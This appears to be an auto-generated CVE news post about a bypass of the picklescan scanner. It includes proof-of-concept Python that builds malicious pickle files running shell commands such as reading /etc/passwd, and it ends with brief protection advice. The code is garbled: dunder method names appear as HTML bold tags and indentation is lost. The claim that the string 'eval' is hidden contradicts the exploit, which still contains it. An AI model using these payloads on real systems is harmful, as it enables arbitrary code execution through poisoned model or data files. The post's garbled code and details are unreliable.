picklescan, Unsafe Deserialization, CVE-2023-52685 (Critical)

Listen to this Post

The vulnerability is an unsafe deserialization bypass in the `picklescan` security tool. It works by obfuscating the malicious `eval` call to evade static detection. When `picklescan` analyzes a pickle file, it scans for dangerous function names like eval. The exploit creates a class with a `__reduce__` method that returns a tuple. Instead of directly returning (eval, ('malicious code',)), it returns a reference to a static method _obfuscated_eval. This method uses `getattr(builtins, “eval”)` to dynamically fetch the real `eval` function. This nesting and indirection hides the string “eval” from a simple string search, allowing the malicious pickle payload to pass through `picklescan` undetected. When the tainted pickle is loaded by a vulnerable application, the `__reduce__` method executes, triggering the `_obfuscated_eval` method, which then calls the hidden `eval` function with the attacker’s payload, leading to arbitrary code execution.
Platform: picklescan
Version: pre-0.1.0
Vulnerability : Unsafe Deserialization Bypass
Severity: Critical
date: 2024-10-26

Prediction: 2024-11-16

What Undercode Say:

pip install picklescan
picklescan ./malicious.pkl
Example malicious pickle generation
import pickle, builtins, os
class EvilPayload:
def <strong>reduce</strong>(self):
cmd = "os.system('cat /etc/passwd')"
return getattr(builtins, "ex"+"ec"), (cmd,)
with open('exploit.pkl', 'wb') as f:
pickle.dump(EvilPayload(), f)

How Exploit:

import pickle, builtins
class EvilClass:
@staticmethod
def _obfuscated_eval(payload):
getattr(builtins, "eval")(payload)
def <strong>reduce</strong>(self):
payload = "<strong>import</strong>('os').system('id > /tmp/pwned')"
return self._obfuscated_eval, (payload,)
pickle.dump(EvilClass(), open('bad.pkl','wb'))

Protection from this CVE

Avoid unpickling untrusted data.

Use `picklescan` version >=0.1.0.

Employ allow-listing for serlialized objects.

Utilize alternative serialization formats (e.g., JSON).

Impact:

Remote Code Execution (RCE).

Bypasses security scanning.

Supply chain compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top